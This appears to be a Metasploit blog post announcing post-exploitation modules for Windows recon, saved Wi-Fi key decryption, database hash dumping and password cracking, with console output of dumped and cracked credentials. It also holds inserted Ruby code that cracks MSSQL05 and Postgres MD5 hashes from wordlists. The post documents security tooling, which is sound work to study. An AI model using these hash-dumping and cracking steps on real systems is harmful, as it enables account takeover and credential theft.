Last updated at Fri, 19 Jan 2024 15:54:51 GMT
The Metasploit Framework continues to grow and expand with the support of the community. There have been many new features added to the Metasploit Framework over the past month. I am very excited to be able to share some of these new developments with you.
Mubix's Recon Modules
Mubix's post-exploitation modules from his Derbycon talk are now in the repository. The resolve_hostname module, originally called 'Dig', takes a given hostname and resolves the IP address for that host from the Windows victim. The enum_termserv module dumps Windows RDP connections from the victim machine, giving you a list of other potential targets. The computer_browser_discovery module, formerly called netdiscovery, taps the victim machine's Computer Browser Service via Railgun. This returns a list of all machines available on the same broadcast domain as the victim machine. An addition to mubix's original module gives users the option to create host records in the Metasploit database for any hosts discovered this way.
[*] [2011.12.05-15:35:57] Found 4 systems.
[*] [2011.12.05-15:36:02] Netdiscovery Results
====================
TYPE     IP            COMPUTER NAME   VERSION  COMMENT
----     --            -------------   -------  -------
69635    192.168.2.35  WINXPTEST       5.1
69635    192.168.2.9   MELODIE         6.1
8556551                DMALONEY-VDSDA  5.2
Windows Wireless LAN
There are a new group of Windows Post modules under post/windows/wlan. These modules all use Railgun to hook the windows WLANAPI. There are currently four modules in this group:
wlan_profile: This module will enumerate all of the wireless LAN interfaces on the machine. It will then enumerate all the saved wireless profiles on each interface. If the Meterpreter session has sufficient privileges it will also decrypt the wireless key material. One caveat to this last part is that Windows XP does not actually store the WPA passphrase. It instead stores the derived key, which was produced from the passphrase with the PBKDF2 function. Since this is all Windows stores, the key is still usable in this form, but it does you no good from a password reuse standpoint. On the TODO list is another module that will make the victim machine connect to a specific network, with the option of using one of the pre-saved profiles or passing it your own profile.
msf post(wlan_profile) > set SESSION 1
SESSION => 1
msf post(wlan_profile) > exploit
[+] Wireless LAN Profile Information
GUID: {eb566b46-0140-4eca-800a-a5e01fae7251} Description: Intel(R) Centrino(R) Advanced-N 6230 State: The interface is connected to a network.
Profile Name: derbycon
derbycon
6465726279636F6E
derbycon
ESS
auto
WPA2PSK
AES
false
passPhrase
false
derbycon
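To make the Windows XP caveat concrete, here is an added example (my own code, not part of the wlan_profile module or the Metasploit Framework) that performs the 802.11i derivation itself: the stored key material is PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations, 32 bytes out. Because the function is one-way, a profile that only holds this derived key cannot give back a reusable clear-text password; the most a reviewer can do is derive a known candidate and compare, which is what psk_matches? does. The sample input is the public 802.11i test vector (passphrase "password", SSID "IEEE"), not anything taken from the profile dump above.

```ruby
require 'openssl'

# Derive the WPA/WPA2 pre-shared key as 802.11i specifies:
#   PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)
# Windows XP stores this 64-hex-digit value rather than the passphrase.
def wpa_psk_hex(passphrase, ssid)
  key = OpenSSL::PKCS5.pbkdf2_hmac_sha1(passphrase, ssid, 4096, 32)
  key.unpack1('H*')
end

# Compare a stored derived key against one candidate passphrase for a given SSID.
# The derivation cannot be reversed, so checking for password reuse means
# deriving the candidate and comparing; there is no shortcut back to the passphrase.
def psk_matches?(stored_psk_hex, ssid, candidate)
  wpa_psk_hex(candidate, ssid) == stored_psk_hex.downcase
end

if __FILE__ == $0
  # Constructed sample: the 802.11i Annex H test vector.
  psk = wpa_psk_hex('password', 'IEEE')
  puts "PSK for passphrase 'password' on SSID 'IEEE': #{psk}"
  puts "stored key matches candidate 'password': #{psk_matches?(psk, 'IEEE', 'password')}"
  puts "stored key matches candidate 'Password': #{psk_matches?(psk, 'IEEE', 'Password')}"
end
```

Note that the SSID is the salt: the same passphrase on two differently named networks yields two unrelated keys, so a derived key recovered from one XP profile says nothing about the same passphrase used elsewhere.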
wlan_current_connection: This module will enumerate all of the wireless LAN interfaces on the victim machine, and then get information about the current wireless connection on each one. This information includes the MAC address of the access point, the SSID, the BSS type, the connection type, signal strength, RX/TX rates, security settings, encryption and authentication algorithms used, and whether 802.1x authentication is used on the network.
msf post(wlan_current_connection) > set SESSION 1
SESSION => 1
msf post(wlan_current_connection) > exploit
[+] GUID: {eb566b46-0140-4eca-800a-a5e01fae7251}
Description: Intel(R) Centrino(R) Advanced-N 6230
State: The interface is connected to a network.
Mode: connection initiated by wireless service automatically using a persistent profile.
Profile: Skynet
SSID: Skynet
AP MAC: xx:xx:xx:xx:xx:xx
BSS Type: Infrastructure
Physical Type: Extended rate PHY type
Signal Strength: 94
RX Rate: 54000
TX Rate: 54000
Security Enabled: Yes
oneX Enabled: No
Authentication Algorithm: WPA-PSK
Cipher Algorithm: TKIP
[*] WlanAPI Handle Closed Successfully
[*] Post module execution completed
wlan_bss_list: This module will enumerate all of the wireless LAN interfaces on the machine. It will then scan with each interface for new wireless networks. It then records the information about all of the available wireless networks. This information includes a lot of the same information pulled down by the current_connection module.
msf post(wlan_bss_list) > set SESSION 1
SESSION => 1
msf post(wlan_bss_list) > exploit
[*] {"GetLastError"=>0, "return"=>0, "ppWlanBssList"=>5282784}
[*] Number of Networks: 16
[+] SSID: horton
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -90
Signal: 16
[+] SSID: Skynet
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: 802.11n PHY type
RSSI: -25
Signal: 99
[+] SSID: WIN_930
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -89
Signal: 18
[+] SSID: The Dragisic Network
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -86
Signal: 23
[+] SSID: jacob1
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -76
Signal: 40
[+] SSID: WIN_BA74
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -78
Signal: 36
[+] SSID: MonroeMFC
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -90
Signal: 16
[+] SSID: starmonster
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -81
Signal: 31
[+] SSID: Eric Home
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -87
Signal: 21
[+] SSID: linksys
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: High-rate DSSS (HRDSSS)
RSSI: -74
Signal: 43
[+] SSID: Tarheel_Country
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -72
Signal: 46
[+] SSID: W32.Blaster.Worm
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -80
Signal: 33
[+] SSID: Leidi
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -88
Signal: 20
[+] SSID: theriault
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: 802.11n PHY type
RSSI: -81
Signal: 31
[+] SSID: EckerNet
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -75
Signal: 41
[+] SSID: Belkin_G MIMO_Wireless_E5A125
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -87
Signal: 21
[*] WlanAPI Handle Closed Successfully
[*] Post module execution completed
wlan_disconnect: This module takes an integer as an argument. That integer is the index of the interface you want to target. Most machines will likely only have one wireless interface, so this option can be left at the default value of 0. The module disconnects the specified wireless interface from whatever network it is currently connected to. This will be more useful once the module to connect the interface to a specified network is done.
Database Hash dumping
There are some interesting new auxiliary modules in the framework now too. These are hashdump modules for several of the more popular database servers: MSSQL, MySQL, Postgres, and Oracle. The modules take supplied credentials and log onto the databases on a given port across a supplied RHOSTS list. They then attempt to dump all the database user password hashes. If that succeeds, they store the hashes in a CSV as loot for further cracking. These modules also attempt to save all the database, table, and instance names from the database, and use them for wordlist building when attempting to crack the hashes.
msf auxiliary(mssql_hashdump) > exploit
[*] Instance Name: "WINTEST2008"
[+] 192.168.2.13:1055 - Saving mssql05.hashes = sa:010051aa13a36f6efb5296ee8b804138173e0696d0892c52fcb6
[+] 192.168.2.13:1055 - Saving mssql05.hashes = ##MS_PolicyEventProcessingLogin##:010031b4ae8d43c66a1a17f5f5e7da86a1764dc48ddc6babdd9e
[+] 192.168.2.13:1055 - Saving mssql05.hashes = ##MS_PolicyTsqlExecutionLogin##:010094044117b73bd4051b810dab0b7db5e3cbd8bb402c36ffe0
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user1:01006dcfe5ee776f7fa8210a33c5bf2aaaef2b5ee25f315a2890
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user2:0100acc65dd1643d5a43320af56bc37861e6ba4af7b9a0e866ee
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user3:0100e838d7b99cedfb902161be09e3e859f2aca099f5eb49684b
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user4:0100a9ec455822cb06dcb752390725649dbf669aa1994669a1ce
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user5:0100a5a9092099814984bbbf0aa851477b5edbd1a5406ba1bebb
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user6:01001d924e4d071f25849387181a2c1b0336b60baecf3e78b874
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user7:01001e0a03d8f99fb1355ae09ebde36686f1041c072e4111f999
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user8:0100c506c9b67d8592f9f36982c82f8907ac38258b1fe358a84c
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_hashdump) >
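The "mssql05.hashes" lines above are worth being able to read without John. Here is an added example (my own code, not the mssql_hashdump module or anything shipped with Metasploit) that parses the SQL Server 2005 hash layout and verifies a candidate password against it. The layout is the publicly documented one: a 0x0100 version marker, a 4-byte salt, then SHA1 over the UTF-16LE password followed by the salt. The only page data reused is the user1 hash from the output above; the salt used to build test hashes is constructed.

```ruby
require 'digest'

# SQL Server 2005 password hash, as a hex string:
#   0100 | 4-byte salt | 20-byte SHA1(UTF-16LE(password) + salt)
MSSQL05_VERSION = '0100'

# Split a hash into its salt (binary) and digest (hex); reject anything else.
def parse_mssql05_hash(hex)
  hex = hex.strip.downcase
  raise ArgumentError, "unexpected length #{hex.length}, want 52" unless hex.length == 52
  raise ArgumentError, 'not a SQL Server 2005 hash' unless hex.start_with?(MSSQL05_VERSION)
  { salt: [hex[4, 8]].pack('H*'), digest: hex[12, 40] }
end

# Recompute the digest for one candidate password and compare it with the stored one.
# force_encoding is needed so the UTF-16LE bytes can be concatenated with the binary salt.
def mssql05_password_matches?(hex, candidate)
  parsed = parse_mssql05_hash(hex)
  utf16 = candidate.encode('UTF-16LE').force_encoding('BINARY')
  Digest::SHA1.hexdigest(utf16 + parsed[:salt]) == parsed[:digest]
end

# Produce a hash in the same layout; used here only to build constructed test data.
def make_mssql05_hash(password, salt)
  utf16 = password.encode('UTF-16LE').force_encoding('BINARY')
  MSSQL05_VERSION + salt.unpack1('H*') + Digest::SHA1.hexdigest(utf16 + salt)
end

# Walk "user:hash" lines (the shape of the loot above) and report which accounts
# use one of the given known-weak passwords. Returns { user => password }.
def check_loot_lines(lines, known_weak)
  lines.each_with_object({}) do |line, found|
    user, hash = line.split(':', 2)
    hit = known_weak.find { |w| mssql05_password_matches?(hash, w) }
    found[user] = hit if hit
  end
end

if __FILE__ == $0
  # user1's hash from the mssql_hashdump output above; jtr_mssql_fast later recovered "password2".
  page_hash = '01006dcfe5ee776f7fa8210a33c5bf2aaaef2b5ee25f315a2890'
  p parse_mssql05_hash(page_hash)
  puts "user1 / password2 matches: #{mssql05_password_matches?(page_hash, 'password2')}"
end
```

The salt is per-account, so the same password on two logins produces two different hashes (user1 and user2 above both cracked to password2 yet their hashes differ); any audit has to hash once per account rather than comparing digests across accounts.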
Linux unshadow
The auxiliary/analyze/jtr_unshadow module is another new addition. This module exists for scenarios where you can pull arbitrary files off victim machines in less standard ways, such as directory traversal attacks. It will take paths to locally stored passwd and shadow files. It will then unshadow the passwd file and store it as loot for future cracking.
New Password Cracking Options
Building on the success of our first John the Ripper (JtR) cracking module, we now have a few more. There are John the Ripper modules for cracking Microsoft SQL Server, MySQL, Oracle, and Linux hashes. They look for the database hashes in the loot files created by the previously mentioned hashdump modules. All of these modules assemble a wordlist based on a number of things:
- The default wordlist we ship with
- All usernames and passwords currently stored in the creds table
- All hostnames in the hosts table
- Any passwords already cracked by JtR (in the .pot file)
- Any captured MSSQL instance names
- Any database and table names gathered by db hashdump modules
- An optional user supplied wordlist
All of these items are pulled together and uniqued to create a wordlist for cracking. The module then attempts limited password cracking using this wordlist and some fast and easy cracking rules. These modules are not a thorough cracking attempt, but rather an attempt to crack the quick and easy hashes. Any hashes that are successfully cracked are then stored as creds in the database.
msf auxiliary(mssql_hashdump) > use auxiliary/analyze/jtr_mssql_fast
msf auxiliary(jtr_mssql_fast) > exploit
[*] Cracking MSSQL Hashes
[*] Cracking MSSQL05 Hashes
[*] HashList: /tmp/jtrtmp20111205-10995-2yklnu-0
[*] Trying Wordlist: /tmp/jtrtmp20111205-10995-1s8wt88-0
guesses: 5 time: 0:00:01:20 DONE (Mon Dec 5 15:13:41 2011) c/s: 3436K trying: �tude1900
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])
[*] Output: WINTEST2008 (user6)
[*] Output: password2 (user2)
[*] Output: password2 (user1)
[*] Output: user3 (user3)
[*] Output: password8 (user8)
[*] Trying Rule: All4...
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 0 time: 0:00:02:05 DONE (Mon Dec 5 15:15:47 2011) c/s: 3947K trying: |||}
[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])
[*] Output: Remaining 6 password hashes with 6 different salts
[*] Trying Rule: Digits5...
guesses: 0 time: 0:00:00:00 DONE (Mon Dec 5 15:15:47 2011) c/s: 2898K trying: 89092
[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])
[*] Output: Remaining 6 password hashes with 6 different salts
[*] user1:password2:192.168.2.13:1055
[*] user2:password2:192.168.2.13:1055
[*] user3:user3:192.168.2.13:1055
[*] user6:WINTEST2008:192.168.2.13:1055
[*] user8:password8:192.168.2.13:1055
[*]
[*] 5 password hashes cracked, 6 left
[*] 5 hashes were cracked!
[+] Host: 192.168.2.13 Port: 1055 User: user1 Pass: password2
[+] Host: 192.168.2.13 Port: 1055 User: user2 Pass: password2
[+] Host: 192.168.2.13 Port: 1055 User: user3 Pass: user3
[+] Host: 192.168.2.13 Port: 1055 User: user6 Pass: WINTEST2008
[+] Host: 192.168.2.13 Port: 1055 User: user8 Pass: password8
[*] Auxiliary module execution completed
msf auxiliary(jtr_mssql_fast) >
One thing to note is that the jtr_linux module is not listed as fast mode. This is because this module can be very slow depending on the type of Linux hashes it is trying to crack. If the hashes were created using crypt(3) this module can be VERY slow.
There is also one other hash cracking module that does not use JtR. This is the postgres_md5_crack module. JtR currently does not support Postgres md5 hashes. These hashes are created by taking the password, appending the username, and then MD5 hashing the result. The postgres_md5_crack module generates a wordlist the same way the JtR modules do. It then takes each word, appends the username of the hash being tried, MD5 hashes it, and compares the result against the stored hash. If it's a match, it saves the discovered cred in the database. This module can actually move surprisingly fast, but it is not necessarily a thorough cracking method.
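The wordlist assembly described in the bulleted list above and the Postgres check just described fit naturally in one piece of code, so here is an added example covering both (my own code, not the jtr_* or postgres_md5_crack modules). The source lists standing in for the creds and hosts tables, the JtR .pot file, the shipped wordlist, captured instance names and gathered database names are all constructed sample data; the mangling rules are a few cheap ones of my own choosing in the spirit of the "fast and easy" rules the text mentions, not the rules the modules actually apply. The hash layout assumed is the one PostgreSQL stores in pg_authid: the literal prefix "md5" followed by the hex MD5 of password concatenated with username.

```ruby
require 'digest'

# Constructed stand-ins for the sources the JtR modules pull together.
SAMPLE_SOURCES = {
  default_wordlist:    %w[password letmein welcome],
  creds:               %w[postgres Summer2011],   # usernames and passwords from the creds table
  hosts:               %w[db01 WINTEST2008],      # hostnames from the hosts table
  pot:                 %w[password2],             # already cracked by JtR (.pot file)
  instance_names:      %w[SQLEXPRESS],            # captured MSSQL instance names
  db_and_table_names:  %w[customers orders],      # gathered by the db hashdump modules
  user_wordlist:       %w[changeme],              # optional user supplied list
}.freeze

# A handful of cheap mangling rules (my own, illustrative only).
def fast_rules(word)
  [word, word.downcase, word.capitalize, word + '1', word + '123', word.reverse]
end

# Pull every source together, apply the rules, and unique the result.
def build_wordlist(sources)
  sources.values.flatten.flat_map { |w| fast_rules(w) }.reject(&:empty?).uniq
end

# Postgres md5 password hash: "md5" + hex(MD5(password + username)).
def postgres_md5_hash(password, username)
  'md5' + Digest::MD5.hexdigest(password + username)
end

# Try each word against one stored hash; the username is the per-account salt.
# Returns the matching word or nil.
def crack_postgres_md5(username, stored_hash, wordlist)
  wordlist.find { |w| postgres_md5_hash(w, username) == stored_hash }
end

# Run over { username => hash } entries, the shape of the module's loot,
# and return { username => password } for every account that matched.
def crack_postgres_entries(entries, wordlist)
  entries.each_with_object({}) do |(user, hash), creds|
    hit = crack_postgres_md5(user, hash, wordlist)
    creds[user] = hit if hit
  end
end

if __FILE__ == $0
  wordlist = build_wordlist(SAMPLE_SOURCES)
  puts "wordlist has #{wordlist.length} unique candidates"
  # Constructed accounts: two weak passwords the wordlist covers, one it does not.
  entries = {
    'postgres' => postgres_md5_hash('Summer2011', 'postgres'),
    'app'      => postgres_md5_hash('letmein1', 'app'),
    'admin'    => postgres_md5_hash('correct horse battery', 'admin'),
  }
  crack_postgres_entries(entries, wordlist).each { |u, pw| puts "#{u}:#{pw}" }
end
```

Because the username is the only salt, two accounts with the same password still hash differently, but an attacker who knows the username (which pg_authid gives away) gets one unsalted-strength MD5 per guess; that is why the text can call this module "surprisingly fast", and why long, unique database passwords matter more here than with a slow crypt(3) scheme.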
These are just some of the new features that have been added to the Metasploit Framework over the past month. Stay tuned as there are sure to be even more great new features coming. If there is something that Metasploit doesn't do, that you think it should, let us know. Better yet, try your hand at writing it yourself and send us a Pull Request on Github! Cheers for now.